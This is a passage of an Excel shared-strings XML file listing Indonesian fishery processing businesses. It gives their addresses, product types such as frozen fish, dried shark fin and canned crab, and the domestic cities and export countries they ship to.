    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Bekasi, Kabupaten Bandung Barat, Kota Bandung, Kabupaten Semarang, Kota Semarang, Kota Surabaya, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Jl. Abu Hanifah No.23, Kel. Tengah Padang, Kec. Teluk Segara, Kota Bengkulu&lt;br&gt;Bengkulu</t>
  </si>
  <si>
    <t>Kp. Leuweunglarangan RT 003 RW 001, Desa Pancawati, Kec. Caringin, Kabupaten Bogor&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Bakso, Roll, Otak-otak, Tahu Bakso, Siomay) </t>
  </si>
  <si>
    <t>Kabupaten Bogor, Kota Bogor</t>
  </si>
  <si>
    <t>Desa Jeruk Purut, Kel. Bulusari, Kec. Gempol, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kampung Cikujang RT 005 RW 004, Kel. Maruyung, Kec. Pacet, Kabupaten Bandung&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Kota Medan, Kota Palembang, Kota Jakarta Pusat, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Sumedang, Kabupaten Purwakarta, Kabupaten Bandung Barat, Kota Bandung, Kota Cimahi, Kota Tangerang, Kota Tarakan</t>
  </si>
  <si>
    <t>Jl. Kolonel Burlian Lrg. Sukawana No.19 RT 001 RW 001, Kel. Karya Baru, Kec. Alang-alang Lebar, Kota Palembang&lt;br&gt;Sumatera Selatan</t>
  </si>
  <si>
    <t>Kota Medan, Kota Palembang, Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Bandung, Kota Depok, Kota Semarang, Kota Surabaya, Kota Tangerang, Kota Denpasar, Kota Makassar</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Alfonsino, Cardinal)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Alaska Pollock, Teri, Makerel Atlantik, Hokke, Konosirus, Makerel, Makerel Pasifik, Pacific Saury)</t>
  </si>
  <si>
    <t>Australia, Canada, Hong Kong, Serbia</t>
  </si>
  <si>
    <t>Cephalopoda Beku (Baby Yari Ika, Hotaru Ika, Cumi-cumi, Surume Ika)</t>
  </si>
  <si>
    <t>Kawasan Industri Agroforestry Terpadu (KIAT), Jl. Raya Tlogowungu Lahar, Kel. Regaloh, Kec. Tlogowungu, Kabupaten Pati&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Sirip Hiu Kering, Kulit Hiu Kering</t>
  </si>
  <si>
    <t>Kulit Ikan Pari</t>
  </si>
  <si>
    <t>RT 10 RW 02, Kel. Prigi, Kec. Watulimo, Kabupaten Trenggalek&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Deho, Layang, Cakalang, Tongkol)</t>
  </si>
  <si>
    <t>Kabupaten Trenggalek, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Taruna No.8 RT 002 RW 004 (Room 3.2, Kel. Pondok Bambu, Kec. Duren Sawit, Kota Jakarta Timur&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Jl. Taruna No.8 RT 002 RW 004 (Room 3.2), Kel. Pondok Bambu, Kec. Duren Sawit, Kota Jakarta Timur&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Jl. P. Nusa Barung Komp. Niaga Malindo No.3A KIM I, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Kota Banda Aceh, Kota Medan, Kota Jakarta Pusat, Kota Surabaya</t>
  </si>
  <si>
    <t>China, Hong Kong, Indonesia, Korea, Democratic People's Republic of, Malaysia, Singapore, Viet Nam</t>
  </si>
  <si>
    <t xml:space="preserve">Tulang Ikan Kering, Perut Ikan Kering, Kulit Ikan Kering </t>
  </si>
  <si>
    <t>Kota Banda Aceh, Kota Medan, Kota Jakarta Pusat, Kota Surabaya, Kota Makassar</t>
  </si>
  <si>
    <t>Kota Banda Aceh, Kabupaten Asahan, Kota Medan, Kota Jakarta Pusat, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Kalimati No.36, Dusun Stoplas, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kabupaten Purwakarta, Kota Bekasi, Kabupaten Banyuwangi, Kota Pasuruan, Kota Mojokerto, Kota Surabaya, Kabupaten Tangerang, Kabupaten Serang</t>
  </si>
  <si>
    <t>Kabupaten Bogor, Kabupaten Bekasi, Kabupaten Pasuruan, Kota Surabaya</t>
  </si>
  <si>
    <t>Australia, China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates, Viet Nam</t>
  </si>
  <si>
    <t>Australia, China, Hong Kong, Malaysia, Taiwan, Province of China, Thailand, United Arab Emirates, Viet Nam</t>
  </si>
  <si>
    <t>China, Malaysia, Russian Federation, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates</t>
  </si>
  <si>
    <t>Australia, China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Beku (Gurami, Bandeng, Patin, Nila, Lele)</t>
  </si>
  <si>
    <t>Australia, China, Egypt, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates</t>
  </si>
  <si>
    <t>Jl. Rungkut Industri VII No.8, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Senangin, Kerapu, Layur, Halibut, Sukang, Beloso, Kakatua, Bawal, Talang-talang, Kakap, Barramundi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tembang, Makerel, Malalugis, Marlin, Salem, Cakalang, Tenggiri, Pedang, Ekor Kuning)</t>
  </si>
  <si>
    <t>Jl. Pandaan Bangil KM 4, Dusun Tudan, Kel. Kemiri Sewu, Kec. Pandaan, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl. Swadaya, Kel. Sungai Kapitan, Kec. Kumai, Kabupaten Kotawaringin Barat&lt;br&gt;Kalimantan Tengah</t>
  </si>
  <si>
    <t>Kabupaten Kotawaringin Barat, Kabupaten Kotawaringin Timur, Kota Palangka Raya, Kota Banjarmasin</t>
  </si>
  <si>
    <t>Jl. Paludem No.42, Dusun Muncar, Kel. Tembokrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Depok, Kabupaten Demak, Kota Makassar</t>
  </si>
  <si>
    <t>Jl. Marsekal Suryadharma Pergudangan Bandara Mas Blok D No.21, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Singapore</t>
  </si>
  <si>
    <t>Jl. Sapari No.33 RT 001 RW 001 Dusun Tratas, Kel. Kedungringin, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Australia, China, Japan, Malaysia, Thailand, United States</t>
  </si>
  <si>
    <t>Ir. Sutami No.107, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Kabupaten Bekasi, Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>Argentina, Brazil, Chile, China, Japan, Korea, Republic of, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Taruna No.8 RT 002 RW 004 Gudang A.5, Kel. Pondok Bambu, Kec. Duren Sawit, Kota Jakarta Timur&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Yogyakarta, Kota Surabaya, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Jl. Cumi Raya No. 8 Muara Baru, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Jl. Raya Narogong KM 12,5 Pangkalan 5 No. 7, Kel. Bantar Gebang, Kec. Ciwikul, Kota Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Cakalang, Tuna)</t>
  </si>
  <si>
    <t>Jl. Peternakan II No.24-B RT 006 RW 007, Kel. Kapuk, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Hiu Asin Kering</t>
  </si>
  <si>
    <t>Ikan Pelagis Asin Kering</t>
  </si>
  <si>
    <t>Jl. Hasanudin RT 002 RW 002, Kel. Kota Baru, Kec. Alok Timur, Kabupaten Sikka&lt;br&gt;Nusa Tenggara Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Lencam, Kuwe, Kerapu, Kakap)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Surabaya, Kota Denpasar, Kota Pontianak, Kota Bitung, Kota Makassar</t>
  </si>
  <si>
    <t>Australia, China, Japan, Singapore, Thailand</t>
  </si>
  <si>
    <t xml:space="preserve">Fillet Ikan Segar </t>
  </si>
  <si>
    <t>Australia, China, Japan, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Australia, China, France, Japan, Korea, Democratic People's Republic of, Netherlands, Saudi Arabia, Spain, Switzerland, Taiwan, Province of China, United Arab Emirates, United Kingdom, United States</t>
  </si>
  <si>
    <t>Australia, China, France, Germany, Japan, Korea, Democratic People's Republic of, Netherlands, Saudi Arabia, Spain, Switzerland, Taiwan, Province of China, United Arab Emirates, United Kingdom, United States</t>
  </si>
  <si>
    <t>Jl. Bawen Bukit Permai C32 RT 07 RW 01, Kel. Bawen, Kec. Bawen, Kabupaten Magelang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>France, Italy, Japan, Spain</t>
  </si>
  <si>
    <t>Jl. Yos Sudarso No. 39, Kel. Kendari Caddi, Kec. Kendari, Kota Kendari&lt;br&gt;Sulawesi Tenggara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemadang, Marlin, Gindara, Cakalang, Tenggiri, Pedang)</t>
  </si>
  <si>
    <t>Australia, Canada, China, Korea, Republic of, Russian Federation, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Emperor, Kerapu, Hachijo, Hamadai, Kakatua, Pinjalo, Bawal, Kakap Merah, Kaci-kaci, Guntur, Barramundi)</t>
  </si>
  <si>
    <t>Jl. Dworowati Raya No.29B, Kel. Krobokan, Kec. Semarang Barat, Kota Semarang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Jl. Sei Brantas No.81, Kel. Babura Sunggal, Kec. Medan Sunggal, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Jl. Barek Motor RT 002 RW 008, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Jahan, Kerapu, Kakap, Ayam-ayam, Kaci-kaci, Ekor Kuning)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Kembung, Talang-talang, Selar Kuning, Tenggiri)</t>
  </si>
  <si>
    <t>Komplek Pelabuhan Perikanan Samudera Kendari, Jl. Samudera No. 3, Kel. Puday, Kec. Abeli, Kota Kendari&lt;br&gt;Sulawesi Tenggara</t>
  </si>
  <si>
    <t>Kota Bekasi, Kota Pasuruan</t>
  </si>
  <si>
    <t>Komplek Pergudangan Sentra Industri Terpadu PIK Blok D-2 No.5, Kel. Kamal Muara, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung, Jl Pari Blok L No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Deho, Kembung, Lemadang, Meka, Gindara, Muroaji)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Putih, Bawal Hitam, Gulama, Emperor, Katamba, Lencam)</t>
  </si>
  <si>
    <t>Sabang Mawang, Kel. Sabang Mawang, Kec. Pulau Tiga, Kabupaten Natuna&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Pisang-Pisang, Jahan, Kerapu, Jebung, Ungar, Kakap, Kaci-Kaci, Ekor Kuning, Pari)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Barakuda, Mata Besar, Tongkol, Bawal, Selar, Layang, Tamban, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Industri Bajomulya Ujung, Kel. Growong Lor, Kec. Juwana, Kabupaten Pati&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Sarden, Salem, Layang, Kerapu, Kembung, Tongkol)</t>
  </si>
  <si>
    <t>Jl. Ir. Sutami KM 12, Kel. Lematang, Kec. Tanjung Bintang, Kabupaten Lampung Selatan&lt;br&gt;Lampung</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Bonito, Makerel, Marlin, Cakalang, Pedang)</t>
  </si>
  <si>
    <t>Australia, China, France, Germany, Hong Kong, Japan, Korea, Democratic People's Republic of, Netherlands, Singapore, Spain, Switzerland, Taiwan, Province of China, Thailand, United Kingdom, United States</t>
  </si>
  <si>
    <t>Jl. Rama Setia No.49, Kel. Lampaseh Aceh, Kec. Meuraxa, Kota Banda Aceh&lt;br&gt;Aceh</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Naget Ikan, Otak-otak Ikan, Kaki Naga, Bakso Tahu Ikan, Dimsum Ikan, Dimsum Udang, Ekado) </t>
  </si>
  <si>
    <t>Kabupaten Aceh Barat, Kabupaten Aceh Besar, Kabupaten Aceh Barat Daya, Kota Banda Aceh, Kota Langsa</t>
  </si>
  <si>
    <t>Jl. Jendral Ahmad Yani Km 14 RT 08 RW 03, Kel. Sepancar Lawang Kulon, Kec. Baturaja Timur, Kabupaten Ogan Komering Ulu&lt;br&gt;Sumatera Selatan</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Salem, Layang)</t>
  </si>
  <si>
    <t>Kabupaten Ogan Komering Ulu, Kabupaten Muara Enim, Kabupaten Ogan Komering Ulu Selatan, Kabupaten Ogan Komering Ulu Timur, Kota Palembang, Kota Pagar Alam</t>
  </si>
  <si>
    <t>Jl. Tratas No.61, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Angola, Bahrain, United Arab Emirates</t>
  </si>
  <si>
    <t>Banjar Dinas Mawar, Kel. Tukad Sumaga, Kec. Gerokgak, Kabupaten Buleleng&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Australia, China, Hong Kong, Taiwan, Province of China, United States</t>
  </si>
  <si>
    <t>Jl. Terboyo Industri Barat Blok E No.4, Kel. Trimulyo, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Semarang, Kota Denpasar</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kakap Putih, Emperor, Kerapu, Layur, Kakatua, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Australia, China, Hong Kong, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Jl. Taruna No.8 RT 002 RW 004 (Room G5 &amp; G7), Kel. Pondok Bambu, Kec. Duren Sawit, Kota Jakarta Timur&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kota Bekasi, Kota Yogyakarta, Kota Surabaya, Kota Denpasar, Kota Balikpapan, Kota Makassar</t>
  </si>
  <si>
    <t>Kota Palembang, Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Bekasi, Kota Yogyakarta, Kota Surabaya, Kota Denpasar, Kota Balikpapan, Kota Makassar</t>
  </si>
  <si>
    <t>Kota Palembang, Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Bekasi, Kota Surabaya, Kota Denpasar, Kota Balikpapan, Kota Makassar</t>
  </si>
  <si>
    <t>Jl. Haji Syamsuddin Dg Ngerang, Kel. Kalaserena, Kec. Bontonompo, Kabupaten Gowa&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Kabupaten Sidoarjo, Kota Surabaya, Kabupaten Jembrana</t>
  </si>
  <si>
    <t>Jl. Kima 12 KAV-5C Makassar, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Katamba, Kerapu, Kaneke, Seabream, Kakap)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Katamba, Kerapu, Kaneke, Seabream, Kakap)</t>
  </si>
  <si>
    <t>Cephalopoda Segar (Gurita)</t>
  </si>
  <si>
    <t>Greece, Italy</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Deho, Layang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Deho, Layang, Tenggiri)</t>
  </si>
  <si>
    <t>Daging Rajungan Sterilisasi Kaleng</t>
  </si>
  <si>
    <t>Japan, Spain, United States</t>
  </si>
  <si>
    <t>Belgium, Malaysia, Netherlands, New Zealand, United Kingdom, United States</t>
  </si>
  <si>
    <t>Gurita Potong Rebus Beku</t>
  </si>
  <si>
    <t>Jl. Cimaburan No.23, Kp. Kelapatujuh RT 04 RW 07, Kel. Sukawening, Kec. Dramaga, Kabupaten Bogor&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Transit No.9, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Bogor, Kota Bandung</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kabupaten Sukabumi, Kabupaten Bandung, Kabupaten Indramayu, Kabupaten Bekasi, Kota Bogor</t>
  </si>
  <si>
    <t>Ikan Bakar</t>
  </si>
  <si>
    <t>Kota Jakarta Barat, Kabupaten Sidoarjo, Kabupaten Gresik, Kota Surabaya</t>
  </si>
  <si>
    <t>Kota Jakarta Barat, Kota Semarang, Kabupaten Sidoarjo, Kabupaten Gresik</t>
  </si>
  <si>
    <t>Poros Pabrik Gula Takalar Km 1,5, Kel. Pa'rappunganta, Kec. Polobangkeng Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Chile, United Kingdom</t>
  </si>
  <si>
    <t>Daging Udang Sterilisasi Kaleng</t>
  </si>
  <si>
    <t>Hiu Kering Asin</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Cirebon</t>
  </si>
  <si>
    <t>Jl. Rajawali No.11 RT 006 RW 003, Kel. Punggul, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Semarang, Kota Yogyakarta, Kabupaten Malang, Kabupaten Sidoarjo, Kota Malang, Kota Surabaya, Kota Tangerang, Kota Tangerang Selatan, Kota Denpasar, Kota Balikpapan</t>
  </si>
  <si>
    <t>Jl. Daendels Km 82.6 No.88, Kel. Sedayulawas, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>China, Malaysia, United States, Viet Nam</t>
  </si>
  <si>
    <t>Udang Pasteurisasi Dalam Kaleng, Cup Plastik, Kemasan Plastik</t>
  </si>
  <si>
    <t>Jl. Sumojoyo Prawiro No.132 RT 002 RW 002, Kel. Mojokrapak, Kec. Tembelang, Kabupaten Jombang&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kabupaten Magelang, Kabupaten Semarang, Kabupaten Pasuruan, Kabupaten Jombang, Kabupaten Madiun, Kota Surabaya, Kota Denpasar, Kota Pontianak</t>
  </si>
  <si>
    <t>Jl. Raya Kenanti, Kel. Kenanti, Kec. Tambakboyo, Kabupaten Tuban&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, New Zealand</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barramundi, Swanggi, Kerisi, Gulama, Sebelah, Senangin, Kuwe, Biji Nangka)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Barakuda, Tongkol, Lemadang, Marlin, Japuh, Layaran, Selar, Layang)</t>
  </si>
  <si>
    <t>Japan, New Zealand</t>
  </si>
  <si>
    <t>Ikan Air Tawar Beku (Lele, Bandeng, Mujair, Patin, Nila)</t>
  </si>
  <si>
    <t>Japan, Korea, Democratic People's Republic of, New Zealand, Saudi Arabia</t>
  </si>
  <si>
    <t>Jl. Raya Labanasem, Kel. Labanasem, Kec. Kabat, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Naget Gurita, Takoyaki, Ebi Furai, Ebi Katsu, Udang Pop, Karage Gurita, Udang Finger)</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Beku (Lele, Bandeng, Nila, Mujair)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Sebelah, Pisang-pisang, Kerapu, Bawal, Kakap, Lidah, Ekor Kuning)</t>
  </si>
  <si>
    <t>Jl. Jenggolo No.45, Kel. Pucang, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Australia, Canada, Japan, Korea, Democratic People's Republic of, Singapore, United States</t>
  </si>
  <si>
    <t>Jl. Propinsi No.01 Kampung Kajang, Kel. Sungai Mariam, Kec. Anggana, Kabupaten Kutai Kartanegara&lt;br&gt;Kalimantan Timur</t>
  </si>
  <si>
    <t>Japan, Taiwan, Province of China, United Kingdom, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Delima Dusun Setia Kawan, Kel. Teluk Pambang, Kec. Bantan, Kabupaten Bengkalis&lt;br&gt;Riau</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kakap Putih, Kakap Merah)</t>
  </si>
  <si>
    <t>Jl. Raya Prancis, Pergudangan Kosambi Permai Blok L No.7, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang, Kota Denpasar</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kota Bekasi, Kota Tangerang Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kod, Malong, Sebelah, Kerapu, Layur, Halibut)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kota Bekasi, Kota Tangerang Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Mata Besar, Bonito, Tongkol, Hokke, Makerel, Pacific Saury, Tuna)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kota Bekasi, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Malong, Sebelah, Flounder, Kerapu, Layur, Halibut)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Bonito, Tongkol, Hokke, Makerel, Pacific Saury, Saba Mackerel)</t>
  </si>
  <si>
    <t>Jl. Taman Anggrek, Kenayan, Kel. Wedomartani, Kec. Ngemplak, Kabupaten Sleman&lt;br&gt;Daerah Istimewa Yogyakarta</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Bakso Tuna, Naget Tuna, Otak-otak Tuna, Kaki Naga Tuna, Tahu Bakso Tuna, Galantin Tuna, Pempek Ikan) </t>
  </si>
  <si>
    <t>Kota Semarang, Kabupaten Sleman, Kota Yogyakarta</t>
  </si>
  <si>
    <t>Jl. KIG Raya Selatan Kav C-7, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kabupaten Bandung, Kota Bandung, Kabupaten Semarang, Kota Yogyakarta, Kabupaten Jember, Kabupaten Banyuwangi, Kabupaten Tuban, Kabupaten Lamongan, Kabupaten Gresik, Kota Surabaya, Kabupaten Tangerang, Kota Tangerang, Kota Ambon</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tenggiri, Tongkol, Cakalang, Kuwe, Layur, Layang)</t>
  </si>
  <si>
    <t>China, Taiwan, Province of China, United States</t>
  </si>
  <si>
    <t>Jl. Raya Pati - Juwana Km. 7 Dk. Guyangan, Kel. Purworejo, Kec. Pati, Kabupaten Pati&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Kota Medan, Kota Jakarta Utara, Kabupaten Rembang, Kabupaten Pati</t>
  </si>
  <si>
    <t>Jl. Pelabuhan Perikanan Samudera Belawan Gabion No.8, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Bawal, Malong, Biji Nangka, Kerapu, Layur, Beloso, Kurisi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Barakuda, Tongkol, Kembung, Salem, Aso-aso, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Ikan Nila RT 02 RW 02 Pekon, Kel. Pagelaran, Kec. Pagelaran, Kabupaten Pringsewu&lt;br&gt;Lampung</t>
  </si>
  <si>
    <t>Abon Lele</t>
  </si>
  <si>
    <t>Kabupaten Pringsewu</t>
  </si>
  <si>
    <t>Lele Crispy</t>
  </si>
  <si>
    <t>China, Japan, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Jl. Ir. Sutami No.24 Kawasan Logistik Terpadu Blok A1, Kel. Parangloe, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Kota Medan, Kota Pekanbaru, Kota Palembang, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Pontianak, Kota Banjarmasin, Kota Balikpapan, Kota Makassar</t>
  </si>
  <si>
    <t>Kota Pekanbaru, Kota Palembang, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Sumedang, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Banjarmasin, Kota Balikpapan, Kota Makassar</t>
  </si>
  <si>
    <t>Kota Medan, Kota Pekanbaru, Kota Palembang, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Semarang, Kota Surabaya, Kota Pontianak, Kota Banjarmasin, Kota Balikpapan, Kota Makassar</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Masak Beku</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Yogyakarta, Kota Surabaya</t>
  </si>
  <si>
    <t>Japan, Netherlands, Singapore, Thailand, United States</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Beku (Lele, Sidat, Bandeng, Bawal, Nila)</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Segar (Lele, Sidat, Bawal, Nila)</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Jakarta Barat, Kota Surabaya</t>
  </si>
  <si>
    <t>China, Hong Kong, Korea, Democratic People's Republic of, Taiwan, Province of China</t>
  </si>
  <si>
    <t>China, Hong Kong, Korea, Democratic People's Republic of, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kabupaten Gresik, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Pembangunan 2 No.33 RT 001 RW 001, Kel. Batu Sari, Kec. Batu Ceper, Kota Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kabupaten Sukabumi, Kabupaten Bandung, Kabupaten Bandung Barat, Kota Tangerang, Kota Serang</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Makerel Atlantik, Lemuru, Makerel, Salem)</t>
  </si>
  <si>
    <t>Kabupaten Bogor, Kabupaten Sukabumi, Kabupaten Pandeglang, Kabupaten Serang, Kota Tangerang</t>
  </si>
  <si>
